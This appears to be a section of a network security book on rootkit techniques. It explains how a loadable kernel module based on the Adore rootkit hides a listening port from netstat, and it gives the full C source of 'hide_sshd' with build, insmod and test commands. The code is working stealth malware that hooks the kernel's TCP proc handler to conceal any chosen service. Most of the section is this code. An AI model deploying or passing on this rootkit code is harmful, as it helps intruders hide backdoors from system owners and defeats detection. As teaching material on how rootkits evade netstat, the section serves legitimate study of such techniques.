Network.Security.Tools [Electronic resources] نسخه متنی

7.4. Hiding from netstat

The netstat tool
lists currently running network services on
a host:

[notroot]$ netstat -na
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address   Foreign Address  State
tcp        0      0 0.0.0.0:22      0.0.0.0:*        LISTEN
udp        0      0 0.0.0.0:68      0.0.0.0:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags     Type    State      I-Node Path
unix  2      [ ACC ]   STREAM  LISTENING  2085   /dev/gpmctl
unix  6      [ ]       DGRAM              1886   /dev/log
unix  2      [ ]       DGRAM              2153
unix  2      [ ]       DGRAM              2088
unix  2      [ ]       DGRAM              2046
unix  2      [ ]       DGRAM              1894

The Adore rootkit allows you to hide a given
set of listening services from a netstat query. It
does this by using the exported proc_net structure
to change the tcp4_seq_show( ) handler, which is
invoked by the kernel when netstat queries for
listening connections. Within the hacked_tcp4_seq_show() function in
hide_sshd.c, strnstr( ) is
used to look in seq->buf for a substring that
contains the hex representation of the port it is trying to hide, and
if this is found, the string is deleted.

7.4.1. hide_sshd.c

Following is the full source code of the
hide_sshd LKM:

/*Thanks to adore-ng from Stealth for the ideas used in this code*/
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/init.h>
#include <net/tcp.h>
/*from net/ipv4/tcp_ipv4.c*/
#define TMPSZ 150
/*hide sshd*/
#define PORT_TO_HIDE 22
MODULE_LICENSE("GPL");
int (*old_tcp4_seq_show)(struct seq_file*, void *) = NULL;
char *strnstr(const char *haystack, const char *needle, size_t n)
{
char *s = strstr(haystack, needle);
if (s == NULL)
return NULL;
if (s-haystack+strlen(needle) <= n)
return s;
else
return NULL;
}
int hacked_tcp4_seq_show(struct seq_file *seq, void *v)
{
int retval=old_tcp4_seq_show(seq, v);
char port[12];
sprintf(port,"%04X",PORT_TO_HIDE);
if(strnstr(seq->buf+seq->count-TMPSZ,port,TMPSZ))
seq->count -= TMPSZ;
return retval;   
}
static int __init myinit(void)
{
struct tcp_seq_afinfo *my_afinfo = NULL;
struct proc_dir_entry *my_dir_entry = proc_net->subdir;
while (strcmp(my_dir_entry->name, "tcp"))
my_dir_entry = my_dir_entry->next;
if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry->data))
{
old_tcp4_seq_show = my_afinfo->seq_show;
my_afinfo->seq_show = hacked_tcp4_seq_show;
}
return 0;
}
static void myexit(void)
{
struct tcp_seq_afinfo *my_afinfo = NULL;
struct proc_dir_entry *my_dir_entry = proc_net->subdir;
while (strcmp(my_dir_entry->name, "tcp"))
my_dir_entry = my_dir_entry->next;
if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry->data))
{
my_afinfo->seq_show=old_tcp4_seq_show;
}
}
module_init(myinit);
module_exit(myexit);

7.4.2. Compiling and Testing hide_sshd

The hide_sshd.c source code assumes we are
trying to hide the presence of sshd running on a
host. If you want to hide any other service, change the value of
PORT_TO_HIDE. For the purposes of this section, we
assume that sshd is running on the host. Make sure
by running netstat:

[notroot]$ netstat -na | grep 22
tcp     0     0.0.0.0:22    0.0.0.0:*    LISTEN

Use the following makefile:

obj-m += hide_sshd.o

Compile using the following make command:

[notroot]$ make -C /usr/src/linux-`uname -r` SUBDIRS=$PWD modules

Insert the module:

[root]# insmod ./hide_sshd.ko

Now sshd will not be visible. Try the
netstat query again:

[notroot]# netstat -na | grep 22

Unload the module
when done:

[root]# rmmod hide_sshd